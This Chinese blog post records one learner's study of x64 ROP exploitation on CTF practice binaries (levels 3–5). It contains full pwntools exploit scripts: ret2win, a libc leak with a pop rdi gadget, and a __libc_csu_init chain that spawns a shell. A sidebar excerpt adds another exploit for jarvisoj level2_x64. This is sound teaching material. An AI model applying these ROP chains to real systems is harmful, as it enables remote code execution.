蒸米ROP_X64学习总结

最新推荐文章于 2025-01-11 20:21:31 发布
原创 最新推荐文章于 2025-01-11 20:21:31 发布 · 2.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #linux #网络安全

X86与X64

x86中参数都是存在栈上,但在x64中的前六个参数依次存在RDI,RSI,RDX,RCX,R8、R9中,如果还有更多的参数的话才会存在栈上

level3(ROP简单绕过NX)

Snipaste_2021-10-09_14-33-52

发现有栈溢出

找到system(/bin/sh)

请添加图片描述

把这个函数写入栈中就ok了 exp如下

#!/usr/bin/env python3
from pwn import *

p = process("./level3")

payload = b"a" * 136 + p64(0x0000000000400584)

p.sendline(payload)
p.interactive()

level4(ROPgadget寻找gadgets)

请添加图片描述

发现它会把system的地址发送出来,这样就可以求偏移offset,就可以得到binsh_addr字符串的真实地址,但因为x64前6个参数是存在寄存器中的,所以我们需要gadgets(pop ret这样的)来实现64位下ROP

可以用objdump去寻找,也可以用ROPgadget去找

我这题用的ROPgadget,输入如下命令

ROPgadget --binary level4 --only "pop|ret" | grep rdi

请添加图片描述

不过好像没找到需要的

但我们可以去调用的libc.so文件里面去找,老样子,先拷贝到桌面

ldd level4
sudo cp /lib/x86_64-linux-gnu/libc.so.6 libc.so

然后去找

Snipaste_2021-10-09_14-56-52

不过命令最好后面加上grep rdi,不然找出来一大堆,不好拿

exp如下

from pwn import *

libc = ELF('libc.so')

p = process('./level4')


pop_call_libc = 0x000000000012228f

system_addr_str = p.recvuntil('\n')
system_addr = int(system_addr_str, 16)
offset = system_addr - libc.symbols["system"]
binsh_addr = next(libc.search(b"/bin/sh")) + offset

pop_ret_addr = pop_call_libc + offset

p.recv()

payload = b"a"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr)
p.send(payload)
p.interactive()

pop rdi ret 可以先把binsh_addrpop进rdi当第一个参数,然后ret调用system_addr,就完成了ROP的构造

level5(通用gadgets)

Snipaste_2021-10-09_15-11-23

这次啥也没有,就一个栈溢出,system()或其地址的辅助函数也全删掉了

但是有一个write函数,可以进行地址泄露,老套路了,前面都写过,不多写了,可以利用内存信息的泄露得到system函数的地址,然后把binsh写进bss段,老套路了也是

但X64下的传参是一个大问题,write一共三个参数要怎么传呢

第一次调用write来泄露地址,参数应该是这样write(rdi=1, rsi=write.got, rdx=4),把地址泄露出来,所以我们要去找对应的gadgets

但有时候ROPgadget并没有类似pop rdi, ret,pop rsi, ret…的gadgets

那这时候我们可以考虑一下x64下万能的gadgets

用指令objdump -d ./level5观察一波

一般情况,只要程序调用了libc.so,程序都会用__libc_csu_init()来对libc进行初始化操作

请添加图片描述

0x400606地址处的代码可以控制rbx,rbp,r12,r13,r14和r15的值,然后再利用0x4005f0处的代码,可以把r15的值给rdx, r14的值给rsi,r13的值给edi,然后call [r12+rbx*8],如果此时rbx为0,那么就相当于call r12,然后我们如果把rbx设为0,rbp的值设为1,rbx加1之后也是1,两个值相等,那么就不会跳转,然后继续执行到0x400628的ret处返回地址,我们把ret那里设置成main就ok

  • payload1(用write泄露地址)

我们先构造payload1,利用write(1,write_got,8)输出write在内存中的地址。注意我们的gadget是call r12,所以我们应该使用write.got而不是write.plt。并且为了返回到原程序中,应该重复利用栈溢出的漏洞,我们应该继续覆盖栈,让ret那里为main的地址

payload1 = b"\x00"*136
#rbx = 0
#rbp = 1
#r12 = write_got
#1 = rdi=  edi = r13, write.got = rsi = r14, 8 = rdx = r15 
#write(rdi=1, rsi=write.got, rdx=8)
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)
payload1 += p64(0x4005F0)
payload1 += b"\x00"*56
payload1 += p64(main)

因为末尾是一个add rsp,0x38 = 57,所以应该往里传7个,所以前面多个p64(0)

p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)

构造好payload1,就可以计算出system函数的真实地址

  • payload2(用read读取地址)

同理

#rbx = 0
#rbp = 1
#r12 = read_got
#0 = rdi=  edi = r13, write.got = rsi = r14, 8 = rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 = b"\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(read_got) + p64(0) + p64(bss_addr) + p64(16)
payload2 += p64(0x4005F0)
payload2 += b"\x00"*56
payload2 += p64(main)

构造好payload2就可以利用read去读取system()的地址以及binsh的地址

  • payload3(调用system函数)

最后构造payload3,调用system()函数执行binsh。注意,system()的地址保存在了bss段首地址上,binsh_addr保存在了bss段首地址+8的位置

#r12 = bss_addr
#bss_addr+8 = rdi =  edi = r13, 0 = rsi = r14, 0 = rdx = r15
#system(rdi=bss_addr+8=binsh)
payload3 = b"\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0)
payload3 += p64(0x4005F0)#函数system已经执行完,下面两行有没有都行
# payload3 += b"\x00"*56
# payload3 += p64(main)

最终exp如下

#!/usr/bin/env python3
from pwn import *

elf = ELF('level5')
libc = ELF('libc.so.6')

p = process('./level5')

write_libc = libc.symbols['write']
write_got = elf.got['write']
read_got = elf.got['read']


main = 0x0400564

payload1 = b"\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)
payload1 += p64(0x4005F0)
payload1 += b"\x00"*56
payload1 += p64(main)

p.recvuntil(b"Hello, World\n")


p.send(payload1)
sleep(1)

write_addr = u64(p.recv(8))
offset = write_addr - libc.symbols['write']
system_addr = libc.symbols['system'] + offset


bss_addr = 0x601028

p.recvuntil(b"Hello, World\n")


payload2 = b"\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(read_got) + p64(0) + p64(bss_addr) + p64(16)
payload2 += p64(0x4005F0)
payload2 += b"\x00"*56
payload2 += p64(main)

p.send(payload2)
sleep(1)

p.send(p64(system_addr))
p.send(b"/bin/sh\0")
sleep(1)

p.recvuntil(b"Hello, World\n")


payload3 = b"\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0)
payload3 += p64(0x4005F0)#函数system已经执行完,下面两行有没有都行
# payload3 += b"\x00"*56
# payload3 += p64(main)



sleep(1)
p.send(payload3)

p.interactive()
gxhhh191
关注
X64ROP
amae_coder的博客
04-10 747
实验步骤: 首先拿到文件先看看有没有什么栈保护 因为在生成文件的时候我们就已经关掉了地址随机化,所以这里并没有什么栈保护 将文件拖入IDA中进行反编译,然后静态分析 这里有先写入hello world ,然后又进入了vulnerable_function函数,我们进入函数看看 我们发现用到了read函数,这里用到的是rbp定位,而它读了200个,实际rbp到ret只有(80...
一步一步学 ROPlinux_x64 篇-level5
weixin_43489686的博客
02-02 1695
这道题是来自的一步一步学ROPlinux_x64篇中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
一步一步学ROPlinux_x64
weixin_34204057的博客
11-07 433
一步一步学ROPlinux_x64篇 一、序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86的ROP攻击:《一步一步学ROPlinux_x86篇》,在这次的教程中我们会带来上...
rop x64分析记录
inquisiter
12-30 682
rop x64分析记录##!c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <dlfcn.h>void systemaddr() { void* handle = dlopen("libc.so.6", RTLD_LAZY); printf("%p\n",dlsym(handle,"syste
一步一步学ROPLinux_X86-大神
qq_43430261的博客
04-23 902
记录跟着大神一步一步学ROPLinux_x86学习ROP的过程,在进行复现的时候,遇到了一些问题,文章中会体现出来。 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86...
【逆向学习记录】学习《一步一步学ROP_x64
卦星的专栏
01-12 1175
1.概述 通过前面几篇文章,基本上搞定了x86的漏洞原理,针对x64的还需要进一步学习,依然利用最经典的当属大神的一步一步教学系列 一步一步学ROPlinux_x64篇 – 环境:ubuntu 16.04 2.linux x86与x64的区别 这里引用一下上面文章中的语言: linux_64与linux_86的区别主要有两点: 1.首先是内存地址的范围由32位变成了64位。但是可以使用...
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 6090
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
通过深入研究这个rop-sample项目,开发者不仅能学习ROP的基本原理和利用技巧,还能了解到如何在实际项目中结合Netty实现安全的网络通信。这对于提升网络安全意识和掌握高级安全技术具有重要意义。 总的来说,这个...
pwn之jarvisoj_level2_x64
勿山几已
01-11 1057
缓冲区溢出漏洞导致漏洞利用system函数,64位程序利用rop设置函数参数
X64编程总结
Fly Follow the Heart
09-11 3584
X64编程和X86还是有一些不同的地方,总结一下日常用到的东西,便于以后查看: 1. 调用约定         调用约定对于函数调用有影响,不同的函数调用,在汇编中会因为函数调用后栈不平衡而崩溃,在C/C++语言中如果使用函数指针或以函数作为参数,造成调用栈的不平衡而崩溃。函数调用方式,说到底是函数调用栈不同。         X86的函数调用方式主要有:stdcall / cdecl /
RCTF 2015 welpwn [ROP] [x64通用gadgets]
ACdream
01-26 872
先checksec一下: 漏洞点其实蛮好找的:程序里也没几个函数 main函数中read了一个字符串,然后当成参数传递给了echo函数 在echo中的函数的接收buffer长度仅仅为0x10,而且是一个一个字符赋值的,栈缓冲区溢出漏洞,0x10 + 0x8 = 0x18个填充 控制了ESP之后,程序开启了NX,一定想到的是ROP 这里的基础知识是: http:/...
【How2Pwn】DreamHack x64下的ROP问题
Jeongon的博客
09-04 1030
Pwn中的ROP问题演示
关于的一步一步学ROPlinux_x86的学习笔记
lingyuexueai的博客
08-12 1646
写在开头:level2没有源码,所以第二个“Ret2libc – Bypass DEP 通过ret2libc绕过DEP防护”做不动……另外socat还没学会用==,按照步骤输入命令后一直没反应,也不知道怎么办,所以后面的远程攻击也没法进行……于是只做了第一个Control Flow Hijack 程序流劫持 原文地址:http://jaq.alibaba.com/community/art/sh...
ROP学习笔记(一步一步学 ROPLinux_x86 篇)
niu_niu_的博客
04-15 3073
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
一步一步ROP X64学习笔记
weixin_30359021的博客
06-12 1114
原文地址https://segmentfault.com/a/1190000007406442,源代码地址https://github.com/zhengmin1989/ROP_STEP_BY_STEP(冒昧的贴一下, 本文有一些作为一只菜鸡的思考,原文大大可能站的角度比较高,有的地方没有写清楚,这里权当补充一下 首先是level4,源代码如下 #include &l...
ROP_X86学习总结
Gtooler的博客
10-08 472
的相关附件感兴趣自行下载 学了点ROP笔记,自己来写个总结 ROP是啥 全称为Return-oriented programming,核心是利用ret指令控制执行顺序,作为一种高级的攻击内存的技术,可以绕过各种简单防御 关于X86 level1(栈上写入shellcode) Linux系统的ASLR会使内存里的地址随机化,可以先关掉 sudo -s echo 0 > /proc/sys/kernel/randomize_va_space exit ida打开会发现有个read函数可以进行
初探ROP
KKABqN
03-16 3745
文章目录0x01 前言0x02 什么是ROP0x03 为什么要ROP0x04 基本ROPret2shellcode含义从原理中解析ret2shellcode从例子中解析ret2shellcode发现利用点确定利用前提调试扩展点ret2text含义从例子中解析ret2text发现利用点确定利用前提调试ret2syscall含义从例子中解析ret2syscall的方法细说系统调用在ret2syscal......
64位ROP——通用gadget
qq_44759495的博客
04-09 3023
原理与目的 程序在编译的时候会加入一些通用函数来进行初始化操作,所以可以针对初始化函数来提取一些通用的gadget,通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令ret连接代码,最终getshell。 实验步骤 chechsec命令检查是否有canary保护 图中显示并没有,如果有的话,就先进行泄露。 IDA反汇编 int...
jarvisoj_level2_x64解题步骤
最新发布
10-19
<think>我们正在处理CTF(Capture The Flag)竞赛中的二进制漏洞利用题目,具体是jarvisoj平台的level2_x64题目。根据用户需求,我们需要提供解题步骤。结合引用[3]中的内容,我们知道这是一个64位的栈溢出题目。 解题步骤通常包括: 1. 检查文件保护机制(使用checksec) 2. 静态分析(使用IDA或Ghidra反汇编) 3. 确定漏洞点和利用方式 4. 编写漏洞利用代码(EXP) 5. 获取flag 引用[3]提到了64位和32位调用约定的不同:64位使用寄存器传递前几个参数(rdi, rsi, rdx, rcx, r8, r9),然后才使用栈。因此,在构造ROP链的时候需要注意。 从题目名称(level2_x64)可以推测,这题与栈溢出有关,并且是64位程序。在level2中,通常存在一个可以溢出覆盖返回地址的缓冲区,并且程序中还有一个后门函数(如system函数)或我们可以利用的gadget。 根据常见解题思路,我们可能需要执行以下步骤: - 通过栈溢出覆盖返回地址,跳转到system函数,并传入"/bin/sh"字符串的地址。 - 由于64位程序参数传递规则不同,我们需要用ROP gadget来设置rdi寄存器(第一个参数)为我们控制的字符串地址。 具体步骤: 1. **检查保护机制**:使用`checksec`命令查看程序开启了哪些保护。通常,NX(堆栈不可执行)保护会开启,我们需要通过ROP绕过。 2. **静态分析**:用IDA打开程序,找到危险函数(如gets、read等),确定溢出点。同时查找是否有现成的system函数和"/bin/sh"字符串,或者我们可以写入字符串的位置。 3. **计算偏移**:确定从输入缓冲区到返回地址的偏移量。可以通过调试(如gdb)或模式字符串(pattern)来确定。 4. **构造ROP链**: - 如果程序中有`system`函数,我们可以直接调用。 - 需要设置第一个参数(rdi)为字符串"/bin/sh"的地址。因此,我们需要一个`pop rdi; ret`的gadget。 - 如果没有现成的字符串,我们还需要将字符串写入到已知地址(如.bss段)。 5. **编写EXP**:使用pwntools编写利用脚本。 现在,我们根据上述步骤详细说明: ### 解题步骤 #### 1. 检查保护机制 使用命令: ```bash checksec level2_x64 ``` 预期输出中,我们关注NX(堆栈不可执行)是否开启,以及是否有Canary(栈保护)和PIE(地址随机化)。通常,栈溢出题目NX开启,没有PIE(或者有PIE但我们可以泄漏地址)。 #### 2. 静态分析(IDA) 使用IDA打开程序,查看main函数和漏洞函数。通常,在main函数中会调用一个存在栈溢出的函数(如vulnerable_function)。在这个函数中,可能会使用`read`或`gets`等函数读取输入,且没有检查长度。 同时,我们还需要查找可利用的函数: - 查看是否有`system`函数(一般在导入表中)。 - 查看是否有`/bin/sh`字符串(可以使用`ROPgadget --binary level2_x64 --string '/bin/sh'`查找)。 - 如果没有现成的字符串,需要找到一个可写地址(如.bss段)并写入字符串。 另外,查找gadget: ```bash ROPgadget --binary level2_x64 --only 'pop|ret' ``` 重点查找`pop rdi; ret`,因为我们需要用它来传递参数。 #### 3. 确定偏移 在溢出函数中,确定输入缓冲区到返回地址的偏移量。可以通过以下方式: - 在IDA中查看栈布局:缓冲区起始地址与保存的返回地址之间的偏移。 - 使用gdb调试,制造一个溢出,通过崩溃信息确定覆盖返回地址的位置。 - 使用pwntools的`cyclic`功能生成一段唯一字符串,触发崩溃后查看覆盖到返回地址的值,然后计算偏移。 #### 4. 构造ROP链 根据已有信息构造: - 如果有现成的`/bin/sh`字符串(假设地址为`binsh_addr`)和`system`函数地址(假设为`system_addr`),那么ROP链可以是: ``` [pop_rdi_ret, binsh_addr, system_addr] ``` - 如果没有,则需要先写入字符串。我们可以通过read函数将字符串读入到已知可写地址(如.bss段),然后再调用system。 #### 5. 编写EXP 使用pwntools编写Python脚本。注意,远程连接时需要知道远程服务的IP和端口。 ### 示例EXP结构 ```python from pwn import * context(arch='amd64', os='linux', log_level='debug') # 加载文件 elf = ELF('./level2_x64') # 确定偏移量 offset = 0x80 + 8 # 示例,具体根据实际情况 # 获取关键地址 pop_rdi = 0x4006b3 # 通过ROPgadget找到的pop rdi; ret地址 system_addr = elf.symbols['system'] # 或者elf.plt['system'] binsh_addr = next(elf.search(b'/bin/sh')) # 查找字符串 # 构造payload payload = b'A' * offset payload += p64(pop_rdi) payload += p64(binsh_addr) payload += p64(system_addr) # 发送payload io = process('./level2_x64') # 本地测试 # io = remote('remote_ip', port) # 远程连接 io.sendlineafter('Input:', payload) # 根据程序输入提示调整 io.interactive() ``` 注意:上面的地址(如pop_rdi)需要根据实际题目替换。 ### 相关问题 §§相关问题§§ 1. 如何确定栈溢出的偏移量? 2. 如何查找程序中的ROP gadget? 3. 如果程序没有提供system函数和/bin/sh字符串,如何利用? 4. 64位程序与32位程序在漏洞利用上有何不同? 5. 如何利用pwntools进行远程漏洞利用? 请根据实际情况调整解题步骤和EXP。注意,具体题目细节可能有所不同,需要根据实际二进制文件进行分析。 </think>### jarvisoj平台level2_x64解题步骤 #### 1. **检查文件保护机制(checksec)** ```bash checksec level2_x64 ``` 预期输出: ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found # 关键:无栈保护 NX: NX enabled # 堆栈不可执行 PIE: No PIE (0x400000) # 地址固定 ``` **关键点**:无栈溢出保护(Canary),但堆栈不可执行(NX),需使用ROP技术[^3]。 --- #### 2. **静态分析(IDA反编译)** - **漏洞定位**: 在`vulnerable_function()`中发现`read(0, buf, 0x200)`,而`buf`位于栈上(大小通常0x80),存在栈溢出。 - **可利用资源**: - 程序自带`system@plt`函数(地址固定) - 存在字符串`/bin/sh`(地址:`0x600A90`)[^3] - 可通过`ROPgadget`查找`pop rdi; ret`: ```bash ROPgadget --binary level2_x64 --only "pop|ret" | grep "rdi" ``` 输出示例:`0x4006b3 : pop rdi ; ret` --- #### 3. **计算溢出偏移量** - 使用`cyclic`生成测试字符串: ```bash gdb-pwndbg ./level2_x64 run <<< $(cyclic 200) ``` - 崩溃时查看`RSP`值(例如`0x6161616161616166`) - 计算偏移: ```bash cyclic -l 0x6161616166 ``` 典型偏移为 **`0x80 + 8`**(128字节缓冲区 + 8字节RBP)[^3]。 --- #### 4. **构造ROP链** ```python from pwn import * context(arch='amd64', os='linux') # 关键地址 pop_rdi_ret = 0x4006b3 # pop rdi; ret binsh_addr = 0x600A90 # "/bin/sh"字符串地址 system_plt = 0x4004C0 # system@plt # 构造payload payload = b'A' * 0x88 # 填充缓冲区+RBP payload += p64(pop_rdi_ret) # 设置RDI参数 payload += p64(binsh_addr) # RDI = "/bin/sh" payload += p64(system_plt) # 调用system ``` --- #### 5. **执行EXP获取shell** ```python if args.REMOTE: io = remote('node4.buuoj.cn', 12345) # 替换实际地址 else: io = process('./level2_x64') io.sendlineafter(b'Input:\n', payload) io.interactive() # 进入交互式shell ``` **执行效果**: ```bash $ cat flag flag{example_flag} ``` --- ### 关键注意事项 1. **64位参数传递**:参数通过寄存器传递(第一参数用`RDI`),需用`pop rdi; ret`设置参数[^3]。 2. **NX绕过**:利用程序自身的`system`和`/bin/sh`避免shellcode执行。 3. **地址验证**:所有地址需通过`IDA`或`readelf`确认。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值